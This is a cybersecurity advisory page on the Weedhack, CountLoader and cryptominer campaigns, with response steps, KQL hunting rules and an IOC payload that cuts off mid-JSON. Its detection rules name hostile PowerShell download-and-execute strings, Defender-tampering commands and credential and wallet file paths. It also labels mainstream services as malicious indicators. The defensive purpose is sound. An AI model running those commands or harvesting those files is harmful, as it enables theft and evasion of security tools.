← Back to Cybersecurity News Center
Severity
HIGH
CVSS
7.5
Priority
0.740
×
Tip
Pick your view
Analyst for full detail, Executive for the short version, or Plain & Simple if you are not a tech person.
Analyst
Executive
Plain & Simple
Executive Summary
Three active malware campaigns, Weedhack, CountLoader, and an unnamed cryptomining operation, have collectively compromised over 86,000 endpoints by exploiting consumer trust in gaming content, pirated software, and streaming sites. Weedhack targets Minecraft players with credential-stealing malware capable of draining browser-stored passwords and cryptocurrency wallets; CountLoader establishes persistent remote access footholds via cracked software channels; the third campaign hijacks clipboard data to redirect cryptocurrency transactions while silently mining Monero. Organizations face dual risk: direct endpoint compromise through employee personal device crossover and enterprise network intrusion via CountLoader's Cobalt Strike and AdaptixC2 beacons, which are designed for lateral movement.
Plain & Simple
Here’s what you need to know.
No jargon. Just the basics.
👤
Are you affected?
Yes, if you play Minecraft and downloaded a hacked game client from YouTube recently.
🔓
What got out
Confirmed: passwords saved in your web browser may have been stolen
Confirmed: cryptocurrency wallet details on your device may have been taken
Suspected: login sessions for websites you were signed into may have been copied
✅
Do this now
1 Stop using any Minecraft hacked client you downloaded from YouTube and delete it from your device. 2 Change the passwords for your email, bank, and any crypto accounts using a device you trust. 3 Turn on a second password sent to your phone for your email and any crypto accounts.
👀
Watch for these
Your crypto wallet sending money you did not send, check your transaction history now.
Emails or messages saying someone logged into your accounts from a new device.
Anyone asking you to confirm payments or send money after you were affected.
🌱
Should you worry?
This is serious if you downloaded a hacked Minecraft client recently. If you did not, you are not at risk from this specific threat.
Want more detail? Switch to the full analyst view →
Impact Assessment
CISA KEV Status
Not listed
Threat Severity
HIGH
High severity — prioritize for investigation
Actor Attribution
HIGH
Weedhack operators (unattributed), CountLoader MaaS operators (unattributed)
TTP Sophistication
HIGH
25 MITRE ATT&CK techniques identified
Detection Difficulty
HIGH
Multiple evasion techniques observed
Target Scope
INFO
Minecraft (versions 1.21.0-1.21.11), Microsoft Defender, Windows (mshta.exe/PowerShell), XMRig, Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, PureMiner, SilentCryptoMiner, Discord, Steam, Telegram, 36 web browsers, 56 browser-based crypto wallets, 12 desktop wallet apps
Are You Exposed?
⚠
Your industry is targeted by Weedhack operators (unattributed), CountLoader MaaS operators (unattributed) → Heightened risk
⚠
You use products/services from Minecraft (versions 1.21.0-1.21.11) → Assess exposure
⚠
25 attack techniques identified — review your detection coverage for these TTPs
✓
Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓
You have incident response procedures for this threat type → Prepared
Business Context
Over 86,000 confirmed compromises represent direct operational risk: credential theft from employee endpoints — including browser-stored passwords and cryptocurrency wallet keys — can escalate to enterprise network intrusion via CountLoader's Cobalt Strike beacons, enabling ransomware staging, data exfiltration, or supply chain attacks. Organizations in financial services, technology, or any sector where employees hold cryptocurrency assets face immediate financial loss through wallet drainage and clipboard hijacking. The MaaS model behind CountLoader means access to compromised environments is likely resold, meaning the initial compromise may be only the first stage of a more targeted attack by a secondary threat actor.
You Are Affected If
Employees run Minecraft Java Edition (versions 1.21.0–1.21.11) on any device — personal or corporate — that shares network access or credential stores with work systems
Users download software from unofficial sources, cracked software sites, or pirated streaming platforms on corporate-managed or BYOD endpoints
Endpoints run Windows with mshta.exe and PowerShell accessible to user-context processes and not restricted by application allowlisting or constrained language mode
Microsoft Defender is the sole endpoint protection layer with no additional EDR behavioral monitoring for LOLBin abuse (mshta.exe, PowerShell)
Browser-stored credentials or cryptocurrency wallet applications are present on endpoints without enforced enterprise password manager policies
Board Talking Points
Over 86,000 devices have been confirmed compromised by three simultaneous malware campaigns targeting employees through gaming downloads, pirated software, and streaming sites — campaigns designed to steal passwords and establish persistent attacker footholds.
Security teams should immediately audit endpoint controls for PowerShell and scripting restrictions, enforce MFA across all externally-exposed systems, and deploy behavioral detection rules within 72 hours.
Without action, a single compromised employee endpoint can provide attackers a persistent beachhead into the enterprise network, enabling ransomware deployment, data theft, or fraudulent financial transactions.
PCI-DSS — Amatera Stealer targets 56 browser-based cryptocurrency wallets and 12 desktop wallet apps; if employees store or process payment card credentials in browsers on affected endpoints, card data exposure is a direct risk requiring incident assessment under PCI-DSS Requirement 12.10
GDPR / regional data protection — Credential theft across 36 browsers on employee endpoints may include access to personal data processed in web applications, triggering breach notification obligations if enterprise data is confirmed exfiltrated
Technical Analysis
Three concurrent campaigns share delivery-chain characteristics, YouTube social engineering, pirated content sites, and cracked software distribution, while deploying distinct payloads.
Weedhack: Targets Minecraft Java Edition versions 1.21.0-1.21.11.
Trojanized hacked clients (notably Wurst) are distributed via YouTube lure videos.
Payload chain delivers PureHVNC RAT and Amatera Stealer. Stealer harvests credentials from 36 browsers, 56 browser-based crypto wallets, and 12 desktop wallet apps. Exfiltration channels: Discord, Steam, and Telegram webhooks/APIs. Persistence via mshta.exe (T1218.005 ) and PowerShell (T1059.001 ). Microsoft Defender evasion confirmed (T1562.001 ). Relevant CWEs: CWE-829 (inclusion of functionality from untrusted control sphere), CWE-426 (untrusted search path), CWE-494 (download of code without integrity check).
CountLoader: MaaS framework distributed via cracked software sites. Multi-stage loader delivers Cobalt Strike and AdaptixC2 C2 beacons. Establishes persistent remote access via PowerShell (T1059.001 ) and JavaScript (T1059.007 ) execution, registry modification (T1112 ), and boot/logon autostart (T1547 ). DLL sideloading (T1574.002 ) and process injection (T1055 ) observed. Obfuscation (T1027 ) and code signing abuse (T1553 ) used to bypass defenses.
Unnamed cryptomining campaign: Delivered via pirated streaming sites. Payloads: PureMiner and SilentCryptoMiner (XMRig-based, T1496 ). Clipboard hijacking (T1115 ) redirects outbound cryptocurrency transactions. Proxy-based C2 (T1090 ) for miner management. Persistence mirrors Weedhack pattern: mshta.exe and PowerShell abuse.
Shared TTPs across all three: T1204.002 (malicious file execution), T1566 (phishing/social engineering lure), T1071.001 (application layer C2 over HTTP/S), T1041 (exfiltration over C2 channel), T1056.001 (keylogging), T1555 (credential store access), T1539 (session token theft), T1113 (screen capture), T1125 (video capture). No CVE identifiers are associated with this campaign set; exploitation is social engineering-driven, not vulnerability-based. No vendor patch is applicable, mitigation is behavioral and policy-driven.
Action Checklist IR ENRICHED
Triage Priority:
IMMEDIATE
Escalate to senior IR leadership, legal counsel, and potentially CISA if: (1) Amatera Stealer exfiltration is confirmed from endpoints storing PII, PHI, or financial credentials triggering state breach notification obligations; (2) Cobalt Strike or AdaptixC2 beaconing is detected indicating CountLoader has progressed beyond initial access to active operator-controlled intrusion; (3) more than 10 endpoints show XMRig or clipboard hijacker activity indicating campaign-scale compromise beyond isolated user incidents; or (4) harvested credentials are confirmed used for unauthorized access to corporate systems, cloud accounts, or cryptocurrency wallets holding organizational funds.
1
Step 1: Containment. Block known delivery channels at the network perimeter: deny outbound connections to Discord, Steam, and Telegram API endpoints from non-approved endpoints; block pirated streaming site categories via DNS/web proxy filtering. Isolate any endpoint exhibiting mshta.exe or PowerShell spawning from browser or media player processes. Reference: NIST SI-4 (System Monitoring), CIS Benchmark 4.4 (Firewall on Servers), CIS Benchmark 4.5 (Firewall on End-User Devices). Concrete steps: Add firewall rules to block api.telegram.org, cdn.discordapp.com, api.steampowered.com on your perimeter gateway.
IR Detail
Containment
NIST 800-61r3 §3.3 — Containment Strategy
NIST SI-4 (System Monitoring)
NIST AC-4 (Information Flow Enforcement)
NIST SC-7 (Boundary Protection)
CIS 4.4 (Implement and Manage a Firewall on Servers)
CIS 4.5 (Implement and Manage a Firewall on End-User Devices)
Compensating Control
For teams without NGFW or proxy: deploy Windows Firewall GPO rules blocking outbound TCP 443 to cdn.discordapp.com, api.steampowered.com, and api.telegram.org for all user-tier processes except explicitly approved apps — use 'netsh advfirewall firewall add rule' or PowerShell New-NetFirewallRule targeting by remote address ranges. Use Pi-hole or Windows DNS policy to sinkhole known pirated streaming domains. For mshta.exe isolation, deploy a Sysmon rule (EventID 1) alerting on mshta.exe with ParentImage matching chrome.exe, firefox.exe, vlc.exe, or java.exe; route alert to a local log file monitored via a scheduled Task running a PowerShell log-scan script every 15 minutes.
Preserve Evidence
Before isolating the endpoint, capture: full Sysmon Event ID 1 logs showing the parent-child process chain (e.g., chrome.exe or a Minecraft launcher spawning mshta.exe or powershell.exe); Windows Security Event ID 4688 with command-line logging enabled showing encoded PowerShell invocations tied to CountLoader or Weedhack dropper activity; Windows Firewall operational log (Microsoft-Windows-Windows Firewall With Advanced Security/Firewall) for outbound connection attempts to Discord CDN, Telegram Bot API, and Steam API endpoints; network capture (pcap via Wireshark on the gateway) of DNS queries and TCP sessions to cdn.discordapp.com and api.telegram.org from the affected host; memory image (via WinPmem or Magnet RAM Capture) before isolation if Cobalt Strike or AdaptixC2 beacon is suspected resident in-memory.
2
Step 2: Detection. Search endpoint logs for: (a) mshta.exe or PowerShell child processes spawned by browser, game launcher, or media player executables; (b) PowerShell executing encoded commands (Get-Content, IEX, -EncodedCommand flags); (c) outbound HTTP/S connections to Discord CDN (cdn.discordapp.com), Steam API (api.steampowered.com), or Telegram Bot API (api.telegram.org) from non-approved processes; (d) clipboard monitoring API calls (OpenClipboard/GetClipboardData) from unsigned or newly installed processes; (e) XMRig process signatures or CPU utilization spikes on endpoints not running authorized compute workloads. Event IDs to review: Windows Security 4688 (process creation with command line), Sysmon Event ID 1 (process creation), Sysmon Event ID 3 (network connection). Reference: NIST AU-2 (Event Logging), NIST AU-6 (Audit Record Review), NIST SI-4, CIS Benchmark 8.2 (Collect Audit Logs).
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis
NIST AU-2 (Event Logging)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST SI-4 (System Monitoring)
NIST AU-12 (Audit Record Generation)
CIS 8.2 (Collect Audit Logs)
Compensating Control
Without a SIEM, deploy Sysmon with SwiftOnSecurity's config (includes mshta.exe, PowerShell encoding, and network connection rules out of the box); forward Sysmon and Security logs to a central Windows Event Forwarding (WEF) collector at no cost. Run this PowerShell one-liner on each host to surface encoded command execution: Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688 -and $_.Message -match 'EncodedCommand|IEX|Get-Content'} | Select-Object TimeCreated, Message | Export-Csv encoded_ps.csv. For clipboard hijacker detection (targeting crypto wallet address substitution by Weedhack/SilentCryptoMiner), use Sysmon Event ID 10 (ProcessAccess) filtering on GrantedAccess 0x1fffff where TargetImage is the calling process; cross-reference with osquery query: SELECT * FROM processes WHERE name LIKE '%xmrig%' OR cmdline LIKE '%stratum%' to detect XMRig pool connections. Use the Sigma rule 'proc_creation_win_mshta_suspicious_parent.yml' from SigmaHQ for mshta parent-process anomalies.
Preserve Evidence
Collect before completing analysis: Sysmon Event ID 3 (NetworkConnect) logs filtered for connections from mshta.exe, powershell.exe, or newly created processes to Discord CDN IP ranges (162.159.x.x Cloudflare space used by Discord) and Telegram API (149.154.x.x, 91.108.x.x); Sysmon Event ID 8 (CreateRemoteThread) entries showing potential Cobalt Strike or AdaptixC2 injection into legitimate host processes; Windows Security Event ID 4657 (Registry value modified) or Sysmon Event ID 13 for writes to HKCU\Software\Microsoft\Windows\CurrentVersion\Run by any process other than a known installer; browser credential store files before they are wiped — copy %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data, %APPDATA%\Mozilla\Firefox\Profiles\*.default\logins.json, and equivalent paths for all 36 targeted browsers; desktop crypto wallet data directories (e.g., %APPDATA%\Exodus, %APPDATA%\Electrum\wallets, %APPDATA%\Atomic) to establish whether Amatera Stealer exfiltrated wallet files.
3
Step 3: Eradication. No vendor patch applies; these campaigns are social engineering-driven. Eradication steps: (a) Remove identified malware artifacts (PureHVNC RAT, Amatera Stealer, PureMiner, SilentCryptoMiner, Cobalt Strike/AdaptixC2 beacon files) using EDR tooling; (b) enforce application allowlisting to block unauthorized executables including mshta.exe invocations outside system contexts (reference: NIST CM-7, CIS Benchmark 2.3 Address Unauthorized Software); (c) revoke and rotate all credentials stored in browsers on affected endpoints (reference: D3-CRO Credential Rotation, D3-CH Credential Hardening); (d) audit and remove unauthorized software including game hacking clients and cracked applications per CIS Benchmark 2.1 and CIS Benchmark 2.3.
IR Detail
Eradication
NIST 800-61r3 §3.4 — Eradication
NIST CM-7 (Least Functionality)
NIST SI-2 (Flaw Remediation)
NIST IA-5 (Authenticator Management)
NIST AC-2 (Account Management)
CIS 2.1 (Establish and Maintain a Software Inventory)
CIS 2.3 (Address Unauthorized Software)
Compensating Control
Without EDR, build YARA rules targeting PureHVNC, PureMiner, and SilentCryptoMiner string signatures (search GitHub for published rules from ANY.RUN or Malpedia entries for these families); run via YARA CLI: yara -r purehvnc_rule.yar C:\ > hits.txt. Use Autoruns (Sysinternals) to enumerate and delete persistence entries written by the malware to HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, and scheduled task XML files under C:\Windows\System32\Tasks. Disable mshta.exe invocation outside trusted installer contexts via Windows AppLocker Publisher or Path rules (available on Windows 10 Pro/Enterprise at no cost): deny mshta.exe execution for all users except SYSTEM in a GPO-linked AppLocker policy. For credential revocation without enterprise tooling, use a browser-exported credentials audit: instruct users to run 'chrome://settings/passwords' export, identify all stored credentials, force password resets at the service level for every stored credential, then clear browser profiles entirely rather than selectively.
Preserve Evidence
Before eradication, forensically image or collect: full directory listing and hash inventory of C:\Users\[user]\AppData\Roaming and C:\Users\[user]\AppData\Local\Temp where CountLoader, Weedhack, and PureMiner dropper artifacts are typically staged; hash values (SHA-256) of every executable in the affected user's Downloads, Desktop, and temp folders for submission to VirusTotal and internal IOC tracking; export of all scheduled tasks (schtasks /query /fo CSV /v > tasks_export.csv) and all Run/RunOnce registry keys before removal to document persistence mechanism specifics used by this campaign; collected browser Login Data SQLite files and any crypto wallet seed/keystore files present under the 12 targeted desktop wallet app directories (Exodus, Electrum, Atomic, Coinomi, etc.) to establish scope of potential credential and wallet compromise; a process memory dump of any running instance of xmrig.exe or an unrecognized process with high CPU utilization to extract XMR wallet address and mining pool URL for IOC reporting and victim notification.
4
Step 4: Recovery. Validate remediation by: (a) confirming no mshta.exe or unauthorized PowerShell execution recurs via EDR telemetry for 72 hours post-cleanup; (b) verifying browser credential stores have been cleared and repopulated only with freshly rotated credentials; (c) scanning for XMRig process artifacts or residual scheduled tasks/autostart registry keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) created by malware; (d) monitoring cryptocurrency wallet addresses associated with affected users for unauthorized transactions. Reference: NIST IR-4 (Incident Handling), NIST AU-6, D3-LAM (Local Account Monitoring).
IR Detail
Recovery
NIST 800-61r3 §3.5 — Recovery
NIST IR-4 (Incident Handling)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST CM-7 (Least Functionality)
NIST AC-2 (Account Management)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Without EDR telemetry, run a recurring scheduled task (every 4 hours for the 72-hour window) executing this PowerShell validation script: Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | Where-Object {$_.Id -eq 1 -and ($_.Message -match 'mshta.exe' -or ($_.Message -match 'powershell' -and $_.Message -match 'EncodedCommand'))} | Export-Csv C:\IR\recovery_check.csv -Append — review output daily. Validate credential store clearance by checking Chrome Login Data file size (should be minimal if cleared) and verifying Firefox logins.json is absent or empty in all user profiles. For autorun registry persistence verification, run Autoruns with 'Hide Microsoft Entries' checked and export to CSV baseline; diff against a clean reference system. For XMR wallet monitoring, use a free blockchain explorer (e.g., xmrchain.net) with the extracted wallet address from memory forensics to check for outbound transactions.
Preserve Evidence
Evidence to confirm successful recovery: Sysmon Event ID 1 logs for the 72-hour post-cleanup window showing no new instances of mshta.exe, xmrig.exe, pureminer.exe, or powershell.exe with -EncodedCommand flags; Autoruns CSV export post-cleanup showing no entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, scheduled tasks, or AppInit_DLLs that were not present on a clean reference baseline; browser profile directory timestamps confirming credential stores were cleared and recreated after the malware removal timestamp; Windows Security Event ID 4720/4726 (account created/deleted) and 4648 (explicit credential use) logs to detect any post-compromise lateral movement or new account creation by PureHVNC RAT before containment was confirmed complete; network flow logs (or Windows Firewall logs) for the recovery period confirming absence of outbound connections to previously identified C2 infrastructure associated with Cobalt Strike, AdaptixC2, or XMRig stratum pool endpoints.
5
Step 5: Post-Incident. Control gaps exposed by this campaign set: (a) absence of application allowlisting allowing unsigned executables, remediate via NIST CM-7 (Least Functionality) and CIS Benchmark 2.3; (b) insufficient user awareness around gaming and pirated content risks, address via NIST AT-2 (Awareness Training); (c) browser credential storage in plaintext/accessible stores, enforce enterprise password manager policy and disable browser-native credential storage (reference: NIST IA-5, D3-CH); (d) MFA gaps on accounts whose credentials may have been harvested, enforce MFA on all externally-exposed applications and administrative access (CIS Benchmark 6.3, CIS Benchmark 6.5, D3-MFA); (e) inadequate monitoring of mshta.exe and PowerShell LOLBin abuse, implement Sysmon rules and SIEM detections for living-off-the-land binary abuse (NIST SI-4, AU-12).
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity
NIST CM-7 (Least Functionality)
NIST AT-2 (Literacy Training and Awareness)
NIST IA-5 (Authenticator Management)
NIST SI-4 (System Monitoring)
NIST AU-12 (Audit Record Generation)
CIS 2.3 (Address Unauthorized Software)
CIS 6.3 (Require MFA for Externally-Exposed Applications)
CIS 6.5 (Require MFA for Administrative Access)
Compensating Control
For AppLocker deployment on a zero-budget team: enable AppLocker via GPO (Computer Configuration > Windows Settings > Security Settings > Application Control Policies) with rules denying execution from %TEMP%, %APPDATA%, and user-writable paths — this directly blocks the dropper delivery paths used by Weedhack and CountLoader without any commercial tooling. For awareness training specific to this campaign, build a 10-minute internal briefing using screenshots from the Weedhack Minecraft mod delivery lure and CountLoader cracked software channels; focus on the specific social engineering premise (gaming performance tools, pirated content) rather than generic phishing. For free password manager enforcement, deploy Bitwarden (self-hosted or cloud free tier) and publish a policy prohibiting browser-native credential storage — enforce by GPO setting DisablePasswordReveal and the Chrome policy PasswordManagerEnabled=false via ADM template. For LOLBin detection hardening, add the Sigma ruleset 'windows/process_creation/proc_creation_win_lolbin_*.yml' from SigmaHQ to your WEF/Sysmon pipeline and tune false positives against your environment's legitimate mshta.exe and PowerShell usage baseline.
Preserve Evidence
Post-incident artifacts to collect for lessons learned and threat intelligence sharing: final IOC list compiled from all recovered artifacts — XMR wallet addresses, Cobalt Strike/AdaptixC2 C2 IP addresses and domain names, file hashes (SHA-256) of all identified PureHVNC, Amatera Stealer, PureMiner, and SilentCryptoMiner samples for submission to CISA's Malware Next-Gen Analysis platform and sharing via ISAC if applicable; documentation of all 36 browser credential stores and 12 desktop wallet application paths confirmed affected to support user notification and scope reporting; AppLocker or software restriction policy baseline gaps documented — specifically which unsigned executables were found in %TEMP% and %APPDATA% paths that a deny-by-default policy would have blocked; timeline reconstruction mapping the initial Minecraft mod or cracked installer download event (browser download history, Windows Prefetch files under C:\Windows\Prefetch for the dropper binary name) through to first C2 callback for post-incident report and detection rule improvement; gap analysis comparing pre-incident Sysmon configuration against SwiftOnSecurity's recommended baseline to document which LOLBin execution events were not being logged at time of compromise.
Recovery Guidance
Post-containment, maintain elevated monitoring of mshta.exe, PowerShell encoding activity, and outbound connections to Discord/Telegram/Steam API endpoints for a minimum of 14 days given that PureHVNC RAT and Cobalt Strike/AdaptixC2 implants may have staged secondary persistence mechanisms not captured in initial eradication. Verify all 36 browser credential stores and 12 desktop wallet application directories on affected endpoints have been cleared and that users have rotated credentials at every service where a stored password was present — prioritize cryptocurrency exchange accounts and any corporate SSO credentials given the Amatera Stealer's confirmed targeting of these asset types. Confirm Minecraft clients on affected systems are sourced exclusively from the official Mojang/Microsoft launcher after incident closure, and validate that no unofficial mod loaders (e.g., unlicensed Forge or Fabric installers sourced from third-party sites) remain installed, as these represent the primary re-infection vector for Weedhack.
Key Forensic Artifacts
Windows Prefetch files (C:\Windows\Prefetch\MSHTA.EXE-*.pf and POWERSHELL.EXE-*.pf) — these record execution timestamps and file paths for mshta.exe and PowerShell invocations triggered by Weedhack and CountLoader droppers, providing initial execution timeline even if the dropper binary has been deleted
Browser SQLite credential databases before clearance: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data, %APPDATA%\Mozilla\Firefox\Profiles\*.default-release\logins.json, and equivalent paths for all targeted browsers — Amatera Stealer specifically targets these files and their timestamps will show last-access time consistent with exfiltration
Desktop crypto wallet keystore and seed files under %APPDATA%\Exodus\exodus.wallet, %APPDATA%\Electrum\wallets\*, %APPDATA%\Atomic\Local Storage\leveldb\*, and equivalent paths for the 12 targeted wallet apps — presence of recent access timestamps inconsistent with user activity indicates Amatera Stealer collection activity
Sysmon Event ID 10 (ProcessAccess) logs capturing clipboard API access (OpenClipboard/GetClipboardData calls) from unsigned or newly installed processes — these are the direct forensic signature of the clipboard hijacker component within SilentCryptoMiner and Weedhack targeting cryptocurrency wallet address substitution
XMRig configuration file and stratum connection artifacts: search %TEMP%, %APPDATA%, and all user-writable paths for config.json files containing 'pool' and 'wallet' keys, and extract XMR wallet address and pool URL from Sysmon Event ID 3 (NetworkConnect) logs showing outbound TCP 3333/4444/14444 (standard XMRig stratum ports) from xmrig.exe or a renamed variant — these provide attribution data and victim wallet compromise confirmation
Detection Guidance
Behavioral indicators (prioritize these, no CVE-based signatures apply):
1.
Process lineage anomalies: mshta.exe or PowerShell spawned as a child of a browser (chrome.exe, firefox.exe, msedge.exe), game launcher (javaw.exe, Minecraft launcher), or media player.
This is not normal behavior and should alert immediately.
2.
Encoded PowerShell execution: Command lines containing -EncodedCommand, IEX (Invoke-Expression), or DownloadString from non-administrative contexts. Sysmon Event ID 1 with CommandLine field matching these patterns.
3. Clipboard API abuse: Processes calling OpenClipboard/GetClipboardData at high frequency, particularly unsigned or recently installed binaries. Cross-reference with cryptocurrency wallet address patterns (Ethereum: 0x + 40 hex characters; Bitcoin: 26-35 base58 characters; Monero: 104-110 base58 characters) in clipboard content.
4. C2 exfiltration channels: Outbound HTTPS connections to api.telegram.org, cdn.discordapp.com, or steamcommunity.com from non-browser, non-approved processes. NIST AU-3 requires audit records capturing source process, confirm your logging captures this field.
5. XMRig/cryptominer indicators: CPU utilization sustained above 80% on endpoints during off-hours; process names or hashes matching XMRig, PureMiner, or SilentCryptoMiner; outbound connections to Monero mining pool domains (pool.supportxmr.com, xmrpool.eu, minexmr.com and similar).
6. Persistence mechanisms: New entries in HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM equivalent created by non-system processes; scheduled tasks created by user-context processes; DLL files placed in application directories alongside legitimate executables (DLL sideloading, T1574.002 ). Use D3-SICA (MITRE ATT&CK Defense System Init Config Analysis) and D3-SFA (System File Analysis) to baseline and monitor these locations.
7. Cobalt Strike/AdaptixC2 beacon patterns: Periodic beaconing at regular intervals (every 60s, 120s, or 300s) to HTTPS endpoints; JA3/JA3S TLS fingerprints matching known Cobalt Strike profiles; large POST requests to pseudo-random URI paths. Reference NIST AU-6 and SI-4 for continuous monitoring requirements.
Log sources to enable if not already active: Windows Security Event Log (4688 with command-line auditing), Sysmon (Events 1, 3, 11, 13), DNS query logs, proxy/web gateway logs with full URL and process attribution, EDR telemetry.
Indicators of Compromise (4)
Export as
Splunk SPL
KQL
Elastic
Copy All (4)
3 domains
1 url
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
🔒
Microsoft 365 E3
3 log sources
Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
🛡
Microsoft 365 E5
18 log sources
Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
🔍
E5 + Sentinel
27 log sources
All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (2)
3 domain indicator(s). Detects DNS lookups and connections.
KQL Query Preview
Read-only — detection query only
// Threat: Triple Convergence: Weedhack, CountLoader, and Unnamed Cryptominer Target Endpoi
let malicious_domains = dynamic(["api.telegram.org", "cdn.discordapp.com", "steamcommunity.com"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_domains)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
1 URL indicator(s).
KQL Query Preview
Read-only — detection query only
// Threat: Triple Convergence: Weedhack, CountLoader, and Unnamed Cryptominer Target Endpoi
let malicious_urls = dynamic(["https://www.youtube.com/watch?v=ssD8jKlb8ws"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (9)
Sentinel rule: Suspicious PowerShell command line
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
KQL Query Preview
Read-only — detection query only
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Phishing email delivery
KQL Query Preview
Read-only — detection query only
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Sentinel rule: Persistence via registry / startup
KQL Query Preview
Read-only — detection query only
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType in ("RegistryValueSet", "RegistryKeyCreated")
| where RegistryKey has_any ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce", "\\Winlogon\\", "\\Services\\")
| where RegistryValueData has_any (".exe", ".dll", ".bat", ".ps1", ".vbs", "cmd", "powershell", "http")
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Process injection / hollowing
KQL Query Preview
Read-only — detection query only
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType in ("CreateRemoteThreadApiCall", "QueueUserApcRemoteApiCall", "WriteToLsassProcessMemory", "NtAllocateVirtualMemoryApiCall", "NtMapViewOfSectionRemoteApiCall")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, ActionType
| sort by Timestamp desc
Sentinel rule: Security tool tampering
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
"Set-MpPreference", "DisableRealtimeMonitoring",
"net stop", "sc stop", "sc delete", "taskkill /f",
"Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: LOLBin abuse (mshta, regsvr32, rundll32)
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "cmstp.exe", "msiexec.exe")
| where ProcessCommandLine has_any ("http", "ftp", "\\\\", "javascript:", "vbscript:", "scrobj.dll", "/i:", "-decode", "-urlcache")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Encoded command execution
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Suspicious file execution from downloads
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FolderPath has_any ("\\Downloads\\", "\\Temp\\", "\\AppData\\Local\\Temp\\")
| where FileName endswith_any (".exe", ".scr", ".bat", ".ps1", ".vbs", ".js", ".hta", ".msi")
| where InitiatingProcessFileName in~ ("explorer.exe", "outlook.exe", "chrome.exe", "msedge.exe")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, AccountName
| sort by Timestamp desc
Falcon API IOC Import Payload (3 indicators)
POST to /indicators/entities/iocs/v1 — Weak/benign indicators pre-filtered. Expiration set to 90 days.
Copy JSON
[
{
"type": "domain",
"value": "api.telegram.org",
"source": "SCC Threat Intel",
"description": "Exfiltration channel used by Weedhack/Amatera Stealer for credential and wallet data exfiltration via Telegram Bot API",
"severity": "medium",
"action": "detect",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-09-02T00:00:00Z"
},
{
"type": "domain",
"value": "cdn.discordapp.com",
"source": "SCC Threat Intel",
